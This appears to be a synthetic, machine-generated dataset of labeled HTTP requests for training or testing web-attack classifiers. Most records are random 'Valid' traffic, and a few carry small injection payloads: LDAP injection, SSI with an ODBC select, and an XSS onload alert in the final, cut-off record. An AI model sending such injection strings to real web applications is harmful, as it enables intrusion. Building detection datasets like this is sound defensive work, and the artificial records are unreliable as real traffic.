Cookie: 69Xl=o4zldb0Bbq;tlxg=2sl2aN;eee4baemsoi=ibZXVXx46
Cookie2: $Version="97"
Date: Sun, 03 Jun 07 15:12:27 CET
ETag: "1GrtRjyzVjvgoMOl2e"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Tue, 21 Apr 09 11:57:23 GMT
If-Match: "0Lui-Brj1HpGiLMW38"
If-None-Match: "DS3fX@W0i5O5Ps3"
If-Range: Sun, 16 Apr 06 21:26:05 CET
Max-Forwards: 8
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest username="pwrd"
Range: 60-99
Referer: /edeqich.png
TE: gzip
Trailer: TE
User-Agent: mepU (eYJBWTJQ3O; iewvHWPI)
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 286x017
Via: HTTP/0.9 64.164.241.183, 7.6 112.188.23.232:86
Transfer-Encoding: gzip
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 16.107.252.123
X-Serial-Number: 736758197053618
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47226
Start - Id: 11431
class: Valid
GET /oxoero3n/@SZHm/5yiiebmr/2SqdXw34oeduoersee/eobrnWiiriweeat/b6tCZooy6RBpmjMo/._SHgNn/uM/7UKaxdl19dXj/Thmjt9n8e.png?81ZMWaccept9=X&edsce=58233706&rbuTiae5sC=xjH1.6&nusaNha=lds&EapPcmd@7feL=86908019 HTTP/1.1
Host: 95.20.210.234:26722
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-stale=2159
Client-ip: 212.244.209.81
Cookie: 2ie=sFghKO;tiotusttisi=5209
Cookie2: $Version="19"
Date: Tue, 17 May 05 10:31:13 UTC
ETag: W/"DSKDJmxOwaDun-6vEuZs"
Expect: 100-continue
From: Nfte6@rmtsm.be
If-Modified-Since: Wed, 03 Dec 08 14:39:40 UTC
If-Unmodified-Since: Mon, 05 May 08 10:29:32 GMT
If-Match: "ALhIBXrpM6PZ0nQnGm"
If-None-Match: "pVytvustPudYD-F"
If-Range: "CUA1ApoMjuJVjm9iJ5oc"
Max-Forwards: 38
MIME-Version: 0.2
Pragma: ShddOa='nnr3'
Proxy-Authorization: u68si atohazra=reig
Authorization: NTLM RE5rZGxwbmViZXQyaGh1emlEYW5ocXN0dHJudGFsbnFjZTg=
Range: 17-873364,-1915
Referer: http://fsqs.org/esllt.php4
TE: gzip
Trailer: Referer
User-Agent: Mozilla/0.2 (Windows; U; WinNT 7.2; gm-os; rv:7.9.5) Gecko/08665086
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1385x852
Via: FTP/2.0 www.hde8tr.shtml, 3.4 www.eaaieatn.tiff
Transfer-Encoding: gzip
Upgrade: AArn2t/8.5, Ccza/1.6, hDt/3.7, e9H/6.2, ghti/3.0
Warning: 568 211.231.110.107 "4fnct2o" 
X-Forwarded-For: 24.107.212.67
X-Serial-Number: 0375108727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11431
Start - Id: 6741
class: Valid
PUT /ogactntoevI/hfFMMAPg5euq85y/5hhkFDnICazbUy0/kuUoatoyeid5/iVFykPj8Xm/cm.cfm? HTTP/1.1
Content-Length: 8
Content-Language: uitIhv
Content-Encoding: compress
Content-Location: /alrab/ooi3e/dCtr3eh/tnrstq/tdff.aspx
Content-MD5: b2M1cWJDMFN0MHNpMWV0Tw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Apr 10 06:17:24 UTC
Last-Modified: Sat, 02 Jul 05 20:34:28 CET
Host: 10.240.191.173
Connection: ndeo
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: em-Szs;q=0.9
Cache-Control: only-if-cached
Client-ip: 3.85.232.163
Cookie: teoWTLJPlog=609441;otaaohgnrmdgar=9
Cookie2: $Version="87"
Date: Wed, 08 Jun 05 03:12:36 UTC
ETag: W/"47QAu0uB2I2rgLYT56rI"
Expect: hete
From: yhiii@asou.ch
If-Modified-Since: Fri, 13 Jun 08 08:49:01 GMT
If-Unmodified-Since: Sun, 05 Nov 06 12:07:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3326
MIME-Version: 5.9
Pragma: wghu='aO'
Proxy-Authorization: NTLM aW5pOFZhdnAxZWhtZnBldGdkaERvS3NkNWphYXNzZHRyZnQ2MmV6dWky
Authorization: FEo3 te9cs5Uo=ahrUO
Range: -857816
Referer: http://www.ehefO5.cz/HtAuc.zip
TE: gzip
Trailer: Referer
User-Agent: mrNdbai (rIsG3cK06b; 6HAhWZC)
UA-CPU: Sparc
UA-Disp: 2751,8436,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3470x340
Via: 1.4 145.119.121.63, FTP/3.7 www.tEFgsA.png, FTP/7.7 www.jL9tn.gif
Transfer-Encoding: gzip
Upgrade: t4isjy/0.0
Warning: 366 171.36.127.196 "totegellhyswl3loi" 
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 377808112519787553
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

nu9=8817

End - Id: 6741
Start - Id: 14160
class: Valid
GET /jzXd.mspx?imh6hAoswse=1287987&oyddncF=nLlh&-php..67vexecVKKs=dBuML4ru&5qMstylek9C=%3Doedhre%5BiS%25me3eh%5C%3Be&dnjae8D=0id&caa2Aa5ns=yMoo__&GlogvIHw-=fate5ulr HTTP/1.1
Host: 233.53.124.163
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 27.84.73.123
Cookie: twnTGo=3472
Cookie2: $Version="66"
Date: Fri, 09 Nov 07 21:37:53 GMT
ETag: "Hr-J6CJaHvBPpAnc5Q"
Expect: 7dOhns
From: zess@lSzAtt.de
If-Modified-Since: Thu, 28 Oct 04 09:11:06 GMT
If-Unmodified-Since: Thu, 11 May 06 24:38:02 GMT
If-Match: "9Pk263TPy2oCCuVHzW0_"
If-None-Match: "syI6Jg6kSCiGJYsZMp-P"
If-Range: Sun, 12 Feb 06 08:48:48 GMT
Max-Forwards: 7081
MIME-Version: 1.3
Pragma: naee=hent
Proxy-Authorization: Basic bmRpbm46aW5sbg==
Authorization: NTLM eWRDYW5pcW9laG1xeXJlaWdvaWU3Y3RlYWVpb2ttSG5nc2Vi
Range: -395
Referer: http://www.et6dQo.biz/s6kgt/olcaasa.txt
TE: trailers,chunked;q=0.9
Trailer: Trailer
User-Agent: Mozilla/5.1 (Windows; U; Win98 5.1; ts-zt; rv:3.7.6) Gecko/10537358
UA-CPU: x86
UA-Disp: 946,473,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5343x014
Via: 7.4 236.189.225.191, 5.8 194.148.140.31, 4.8 181.193.23.240
Transfer-Encoding: deflate
Upgrade: aQtoie/8.0, t8d/8.0, w1leq/8.5, llr/0.4
Warning: 166 42.97.253.158 "rwatpa" 
X-Forwarded-For: 126.23.131.140
X-Serial-Number: 8863769
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14160
Start - Id: 37977
class: LdapInjection
GET /a4TN/W53EOdropperljfvpositionEF/7ssteqMp/it7qyhic/nrnsbetet/ipQ1AZKhVWvMxf/m3e7Aptttesfrttc5g/oo6qEbj/eG-sXhEyVJYB/kgo4tsUta/mMNUnwP4bcZz12214/sdozncaibnuytzrAmoi.msf?csa=ut%29%28++++%7C++++%28goonn%3D*%29&wp-1openoservicesP7YmS=294645 HTTP/1.1
Host: www.wwimhtca1.com
Connection: y2q5ne
Accept: */*
Accept-Charset: iso-10646-ucs-2, iso-8859-2, iso-8859-15, x-mac-ce;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: min-fresh=0
Client-ip: 4.162.83.225
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="64"
Date: Tue, 20 May 08 22:54:26 CET
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Mon, 29 Sep 08 09:10:49 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Jan 08 24:28:42 UTC
Max-Forwards: 88
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest cnonce="iOnh9"
Range: 4893-,-7197
Referer: http://tNpt5kpn.ch/alljouu/notkydhf/otgqa3w.php4
TE: chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/7.8 (X11; U; Linux i386 9.0; On-tm; rv:2.7.3) Gecko/49634425
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8848x2681
Via: HTTP/1.9 www.ltTe.css:8239, 4.8 www.e7hr.jpg, ck9o/7.0 125.0.154.24
Transfer-Encoding: tNlu
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37977
Start - Id: 18849
class: Valid
GET /8qi/copybin56D6-Kf/ol1r1e7hju/gfkk1XzmA.htm?-shutdownR8-E=fromcAd&laouiacl=ht9BZwvLk HTTP/1.1
Host: 119.114.205.178:4
Connection: close
Accept: application/*;q=0.8, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: d-agia1P;q=0.4, dasslqt-hiM;q=0.6, yTbhj-na;q=0.5
Cache-Control: no-store
Client-ip: 228.55.43.33
Cookie: fEondt2=558786966;Hhtewsdnaawe=3955849;pirs0ooput=6;dceN3s=eyn7llfhbhlect;ehauo=yZlegt
Cookie2: $Version="1"
Date: Wed, 02 Feb 05 06:54:58 CET
ETag: "Y@rExN4rE4Iovx2vndI"
Expect: 2o6be6fd
From: oiir0@raaeopgcl.it
If-Modified-Since: Tue, 29 Dec 09 17:47:53 GMT
If-Unmodified-Since: Sun, 20 May 07 21:27:24 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Feb 05 05:47:03 GMT
Max-Forwards: 9199
MIME-Version: 1.1
Pragma: rDLmyTio='ouamo'
Proxy-Authorization: jniene rlc0of=edatai
Authorization: Basic ZW5jMXo6UmVNdGU=
Range: -4
Referer: http://www.pnn2.com/rzebgt/susny.cfm
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/6.6 (Windows; U; WinNT 6.3; ah-ie; rv:9.7.1) Gecko/74437435
UA-CPU: MIPS
UA-Disp: 8023,7803,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 928x9572
Via: 7.0 8.251.132.30, ueAHe/1.0 175.216.158.173
Transfer-Encoding: compress
Upgrade: hhse/5.8, OOtIlr/6.6, swie/9.3, mroc/7.7, taRta/6.4
Warning: 911 www.mclwl.shtml "mteatliekhoncjtInek" "Tue, 16 Jan 07 20:18:18 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 8138044161
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18849
Start - Id: 25740
class: Valid
GET /Zawnk/Ft_/nt2OhHRQ0e/d8U3bJL@v90PQwjo/hueawae.php4?eqmrdle=l6curedraniBadeeTf&bonu4rd3ShaenhI=erfeQs&ndzbuoobSwoct=95&ggs6eajgjheuTl=l4tt&att=aieejic8hitenas&a5o7edtikcg=125427&DXhTw=%7Ce%28%29tdtohn%3Bkeq+i&ws6oi=49&ynnabuE5noiatc=tTt6P3a4o&crl7hedm=ennm%29&yriiiNmwiik=pshh%7Cx+ HTTP/1.1
Host: 33.69.0.35
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=9
Client-ip: 201.188.83.227
Cookie: oeisEhnbgnmpo=asuea
Cookie2: $Version="972"
Date: Sun, 29 Jun 08 04:41:16 CET
ETag: W/"Hd49XJxD5aG5izO-T"
Expect: mfpntsav
From: nisoe@sgkdtlfs6d.uk
If-Modified-Since: Wed, 07 Jan 04 19:03:11 UTC
If-Unmodified-Since: Sat, 25 Feb 06 14:01:15 GMT
If-Match: "jJFIsq6nyU0BzBB"
If-None-Match: "CklovpfT5vRH9ht88XKr"
If-Range: Mon, 16 Jun 08 14:49:01 GMT
Max-Forwards: 4
MIME-Version: 9.2
Pragma: wcsnEnjx=r98wde2A
Proxy-Authorization: Digest qop=eedi
Authorization: NTLM aGljc2xldDNueXNjd3ZlMjFlYW1yNWVuaGFuZUNhYWVFb3lzaG9Zck9yNm1lbA==
Range: 5-5065,03839-,886020-
Referer: http://www.ihztw.net/diet/j2ase.aspx
TE: chunked;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 5.4; vl-iV; rv:9.1.0) Gecko/82718227
UA-CPU: PowerPC
UA-Disp: 7894,3200,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7472x595
Via: HTTP/3.4 66.124.71.148
Transfer-Encoding: rsfk; vspO=6llon
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 088 www.asOfh.shtml "ieEtdD" "Fri, 04 Jan 08 19:16:16 CET"
X-Forwarded-For: 1.21.31.218
X-Serial-Number: 896516230785
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25740
Start - Id: 8923
class: Valid
GET /oFTsaLR72fgQT1PZafG/NsrbetweenV7ubscM/uhsuruevduhocdhsndsn/d6V3u5j1DO/6E@snMf.png?caa=r+shutdownnyu%2FE%2Fs2h%7Eaaraohaving&eIa=hdsskW&efetyetiu=85942&bv=3237&se=8.IQcxr7&neqeyt=1%7E%3At%25uho%29selecto%2B&eae=98&nnidP=igHhQEbi3&Hemew=wa%3At&5gPfcfBNmfpnrp=e3qSr5.Up&4n=335240&Ed8ahOgqg=1&5N=utc&aOduw4epeo=etmpb&att=729074875 HTTP/1.1
Host: 13.36.220.42:62715
Connection: 1eoaost
Accept: */*
Accept-Charset: iso-8859-2;q=0.5, koi8;q=0.4, x-mac-japanese, windows-1255;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: HorRhn-nrh;q=0.9, eo-ftio1, ohlhl-rrsde;q=0.8, tr3erf-a
Cache-Control: min-fresh=04
Client-ip: 214.41.97.175
Cookie: ef=hboot.inistyleahttgot;jkiohhhaoi=9rilf;gsvactpi6oLnM=eegwDQc7v;ytie4oal=523;nto=0d\
Cookie2: $Version="266"
Date: Wed, 16 Jul 08 04:00:26 UTC
ETag: "UFDP4HrPU@2cKXj"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Fri, 16 Jul 04 16:51:12 CET
If-Unmodified-Since: Wed, 29 Jun 05 16:31:21 GMT
If-Match: "oaiqAdb3Ze4uUYFF"
If-None-Match: "QtoQ@sN0Dmea_GDtdzP"
If-Range: Wed, 06 Jul 05 10:21:56 GMT
Max-Forwards: 585
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic cm9kMGhuMjpvYUl5enZvaA==
Authorization: Basic MXREeWl0YWg6aWFlOA==
Range: 7-3572
Referer: http://www.noaaze.fr/anenadt/s4nSqo/atichd/3Zaz.asmx
TE: trailers
Trailer: Cache-Control
User-Agent: 5ostewli5cuDd
UA-CPU: 68000
UA-Disp: 065,7616,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3660x726
Via: 5.8 247.115.225.145, FTP/8.9 www.pteg.html, peu/1.2 www.lejttTe0.gif
Transfer-Encoding: fteonn; o9tee=roTNnf
Upgrade: D54Tc/5.2
Warning: 571 130.163.218.71 "0rarimveh" "Tue, 26 Dec 06 12:43:48 GMT"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 010709448680546
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8923
Start - Id: 25288
class: Valid
GET /eonsi6fw/5d_A2kEORxfzTu/sTgUP4ihktZOZa6wjnVp/as4Sd_geojrFEVY..Iq/eaeershrcbiv4foas0S/folirSewfisdse/bjz/sY5/IZfFHopenWYUSs1b.php4?oent=muSkgeTee&etnr1qagelrtm=5649054&ltra2tgeurdpgr=rbm%25u5hch9e4&eeeenoetaseiaai=k0.RuY1&_9Ocm=oYWrNf&ro=57&8@6p-link=i%40 HTTP/1.1
Host: 48.205.236.97
Connection: aIateea
Accept: */*
Accept-Charset: windows-1255, windows-874;q=0.6, iso-8859-8-i;q=0.2, us-ascii, iso-8859-6;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 103.126.32.237
Cookie: 7cioTshrrtseahw=b (8@;epsnesji=bnrledneex;irY3dnonottt4=saTrce
Cookie2: $Version="74"
Date: Fri, 10 Nov 06 17:01:49 GMT
ETag: W/"EKHxEwOdhj_m9BC"
Expect: 100-continue
From: tgej@l4Mpeyut.cz
If-Modified-Since: Sat, 24 Apr 04 13:23:03 GMT
If-Unmodified-Since: Sun, 26 Mar 06 05:14:52 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Dec 04 04:09:05 CET
Max-Forwards: 7461
MIME-Version: 9.9
Pragma: e=dobjei
Proxy-Authorization: iDor bidltu6W=esnn
Authorization: NTLM ZXRPZWVzdG41c29wZXY4Y2VXdG5CdzRlYWVjZTl6T2FlbnQ=
Range: 14-8536,5-5795
Referer: /ezaendt/rhhrro/crhtr/mraniei.ace
TE: trailers
Trailer: Accept
User-Agent: eai6 (sa00FEG8; e6PWd_rT)
UA-CPU: Sparc
UA-Disp: 8204,1865,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9336x783
Via: 0.0 www.mnasn7t.jpg, 0.2 www.geptt.css:0
Transfer-Encoding: deflate
Upgrade: eeatdB/9.3, ledwr/7.1, aho/6.1, tyrUls/5.5, Nr2gre/4.2
Warning: 776 www.rdYxT.js:39275 "ktn2Rsp3eeodnxlt1dmc" "Sat, 28 Jun 08 20:23:50 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25288
Start - Id: 40844
class: SSI
GET /50dAnvHpkaK/8nfet9/ah/fq7Adot/n9aipoy.msf?eoena=%3C%21--++++%23odbc+++++connect%3D%22awattse%2Care%2CFyeac%22++++++++statement%3D%22select++++*+++++from+++++ANm%22--%3E&nomg0=%29sI%26l HTTP/1.1
Host: 119.151.162.242
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.2, compress
Accept-Language: oeuIatb-gh, Ecr5Nabg-amxsad
Cache-Control: yR7es=tti2lc
Client-ip: 75.99.25.245
Cookie: bNtm=79;oo=30508
Cookie2: $Version="28"
Date: Mon, 29 Sep 08 10:48:31 UTC
ETag: "c4DJWXpb1.Q0Ita"
Expect: un3h
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Tue, 08 Feb 05 05:48:23 UTC
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 28 May 09 13:35:43 UTC
Max-Forwards: 905
MIME-Version: 1.5
Pragma: stseT='3V'
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 68-,5-
Referer: /ao5gs/dRlee/ddno4v/0moo/eaypsoSb.swf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.3 (X11; U; Solaris 7.5; qe-oe; rv:7.7.2) Gecko/63735976
UA-CPU: PowerPC
UA-Disp: 7505,615,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: 3.8 www.fius.tiff
Transfer-Encoding: deflate
Upgrade: smTMae/0.2
Warning: 895 www.misa5.html "rhe6s4bantnhdot" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 938964588863184564
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40844
Start - Id: 28467
class: Valid
GET /oztl5gl6lSdgAuia/I2h2iariqiqawya/msneefmasrqnts/t1me/dymBniIi/rvTUS0ZETqT5by/ntFi7.htm?icredeanum=0082812&Ertfegdak2gnr=enc9ipwetsr&MK@3d-childtUG3C=t&id3mSacceptf=8918671 HTTP/1.1
Host: www.a1nefllShe.st
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: brgrnr-tSfeoo0, maee2oiv-ilalmng, DtNhS-znNd;q=0.9, acd-f;q=0.7
Cache-Control: min-fresh=85
Client-ip: 101.181.119.148
Cookie: ttPElrepwi67=47755594;a-m4C7HlIltF=911078
Cookie2: $Version="0"
Date: Sat, 31 Mar 07 24:35:54 CET
ETag: "FtQPPMZUZcIvhY9I6XA-"
Expect: 100-continue
From: zneku@9etnnTes8.it
If-Modified-Since: Sat, 31 Dec 05 16:02:04 CET
If-Unmodified-Since: Mon, 16 Nov 09 03:13:18 UTC
If-Match: "MZth@9PdY4DCkX5bY"
If-None-Match: *
If-Range: Fri, 06 Aug 04 11:50:06 UTC
Max-Forwards: 51
MIME-Version: 1.7
Pragma: m='Eheedrr'
Proxy-Authorization: NTLM Q2xpdG5OcGhqaHVucWFoZmhlcmZOZ2UyZUhiZ2FwaWEwdXNBc29l
Authorization: Digest algorithm=mwewlos
Range: 51205-,399-
Referer: http://der2.fr/ttehes/osa2o/Rnteoit/iNsor0ts.asmx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.0 (X11; U; Linux i586 6.2; eK-Ec; rv:8.4.5) Gecko/16515756
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 686x883
Via: 5.7 www.3ovMeadH.gif, 8.1 www.dilercjs.jpg:9
Transfer-Encoding: compress
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 717 213.77.249.79 "ztr6oRnm" 
X-Forwarded-For: 7.240.245.49
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 28467
Start - Id: 23968
class: Valid
GET /nse/nrdrmeh/ADAq3%u/ttdkes/tDjhuhhthE/L.@hOt5widH.6/eeoA/ubl6tueacouNiit/fiodnerirb7emoi/oTk3tGdp7Zz4y/k--QScd0K78bodyR/exrYre.pl?oit6TonaL=s7kCLYZp HTTP/1.0
Host: 225.12.162.85
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: t75=a
Client-ip: 75.189.212.193
Cookie: Aoe= $Mpwhera|k/m- ;anetsarvhs=dc5M6;nxositule= ha
Cookie2: $Version="33"
Date: Sat, 18 Oct 08 18:39:16 UTC
ETag: W/"pzH1S5tY2gkdg3P"
Expect: piAhnn=ayu8r;oToewez
From: htqn@tqeodss7o.fr
If-Modified-Since: Tue, 07 Apr 09 16:11:40 CET
If-Unmodified-Since: Sun, 27 Apr 08 03:33:44 UTC
If-Match: "Pi4fP7KA1EU6cFk9uxWN"
If-None-Match: "kigHLxaFNVZg4M8dEs"
If-Range: Tue, 13 Jul 04 01:46:19 GMT
Max-Forwards: 4
MIME-Version: 9.0
Pragma: s=doxX
Proxy-Authorization: Basic aHVlaTg6bm1kbzIyZXQ=
Authorization: Basic cmVudHNvYzp3c3c2
Range: 074-7647,9-,-3
Referer: http://tedoIw.gov/enPI/IaaAoe/esmaesmj.jsp
TE: trailers,deflate;q=0.7,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 4.5; 0W-0s; rv:1.9.2) Gecko/26938518
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 424x2298
Via: 9.3 www.Alol.css:7025, eBlnt/7.7 202.120.30.200
Transfer-Encoding: deflate
Upgrade: enhoj/4.8, Bdg/4.7
Warning: 887 www.oialrTl.png:6 "2bmahswyehtth" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 149109156633944
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23968
Start - Id: 3372
class: Valid
GET /cwJwI4ToTNRCt_FV2/7S/ehdyri8ziBaUb3fcfpm/Dgroup byWbgsoundWSservices2LBHV/hSCrpd4/uhJ7.WAu/iee6roNaraue/_BdyCoa.Hm8WZ-/erD6ZKFlZCsp7eu/N2a2t2rwj.cfm? HTTP/1.1
Host: 93.254.11.245:80
Connection: close
Accept: image/*;q=0.0
Accept-Charset: x-mac-turkish;q=0.7, iso-2022-jp
Accept-Encoding: deflate, compress;q=0.8
Accept-Language: *;q=0.0
Cache-Control: max-age=02114
Client-ip: 241.173.41.168
Cookie: eoemoaoc2tynO=heochildOPztmpr;S1G3htaccesgkVcopy=Uyigea]:t6S/usrfRe 
Cookie2: $Version="2"
Date: Wed, 21 Apr 10 17:53:00 GMT
ETag: "KTZQQj7JqDfCVkbxwi"
Expect: 100-continue
From: mEt7Rt@xbaiymu.st
If-Modified-Since: Thu, 08 Jul 04 04:12:00 UTC
If-Unmodified-Since: Sun, 04 Jan 09 05:37:02 GMT
If-Match: *
If-None-Match: "98oQ@QmDz1A8NeOyT1hE"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic am1YaThzdHQ6MWFtYWEyOA==
Authorization: Digest nc=C5309BbD
Range: 65294-
Referer: /ayeEcdM/dgLoa/ay2t0se.jsp
TE: trailers,chunked,gzip;q=0.8
Trailer: Via
User-Agent: t8Tuamgts (aUAfzoXyK; o9tvKN; oLp6zm4; 1neiZo5Oh9)
UA-CPU: MIPS
UA-Disp: 351,552,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0842x046
Via: 2.7 153.12.78.154, FTP/4.8 112.225.197.228, 0.6 111.124.75.228
Transfer-Encoding: deflate
Upgrade: 8geT/0.3, 4iurl/1.5, c8e/8.6, 4jjimf/2.7, mzei/6.0
Warning: 873 1.206.34.142:2 "iehsLoeRm4h" "Mon, 06 Jul 09 01:55:19 CET"
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3372
Start - Id: 4313
class: Valid
POST /lIJwWUN/io2ao/h1JTjv_inoA7a8clt18y/64nRhy/nVNfnuZ.jpg? HTTP/1.1
Content-Length: 16
Content-Language: targe3,tiasnnfc,rh
Content-Encoding: deflate
Content-Location: http://www.rraftae.cz/mivenO/tmee6b.cfm
Content-MD5: Q2hlc2F3dHQwYW91ZG1ydA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Jun 05 05:25:16 CET
Last-Modified: Thu, 25 Jan 07 04:42:35 GMT
Host: www.i6gtAEl3n.st:80
Connection: tyessc
Accept: audio/basic;q=0.0
Accept-Charset: cp-936;q=0.0, iso-8859-7;q=0.2, us-ascii;q=0.9, x-mac-ce;q=0.4
Accept-Encoding: *
Accept-Language: h-anmnmO;q=0.2
Cache-Control: max-stale=61806
Client-ip: 52.150.137.172
Cookie: oitdzatabep=linpfnrA5aSrseiel
Cookie2: $Version="33"
Date: Wed, 12 Aug 09 21:40:02 CET
ETag: W/"RXwfcJIj2IaHxU4@c0"
Expect: 100-continue
From: hniryitt@cesrtata.de
If-Modified-Since: Sat, 06 May 06 18:36:28 CET
If-Unmodified-Since: Wed, 07 Jun 06 14:18:02 GMT
If-Match: *
If-None-Match: "l_7igARvdBFKO-2MxQ"
If-Range: *
Max-Forwards: 3083
MIME-Version: 4.2
Pragma: e=savaaMgd
Proxy-Authorization: Basic aW90aGk6aXRlYm5l
Authorization: Basic bnJlYXJubXU6aW1hb29kdA==
Range: -389376,1-
Referer: http://www.7hus.fr/leatea/LsnjndTo/nailc.aspx
TE: gzip;q=0.9,trailers
Trailer: From
User-Agent: eeWhdi (iOREcT2Cr; 7ko_PH4guP; iLWjeEyKg; xFJD4cr)
UA-CPU: MIPS
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 935x029
Via: 9.6 www.8EsPa.jpg
Transfer-Encoding: gzip
Upgrade: eiamyL/9.8, 8ie/8.9, s3w/0.2, TesrSa/4.9
Warning: 230 www.eetm.shtml "attezh8alecnXforas" "Sun, 16 Sep 07 10:35:28 GMT"
X-Forwarded-For: 52.131.80.121
X-Serial-Number: 763527830463
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

0sc1rBaaso8tiw=R

End - Id: 4313
Start - Id: 47233
class: XSS
GET /ITpVkfaudEFwm/sl0uae9sdtwNleer2mhm/laXB/mN/Hn/h5imtEiv6Ett1ndpr1a.msf?iife2Daua0ohym=rusn++onload%3Djavascript%3A+++alert++%28tcaza2tE.1e%29 HTTP/1.0
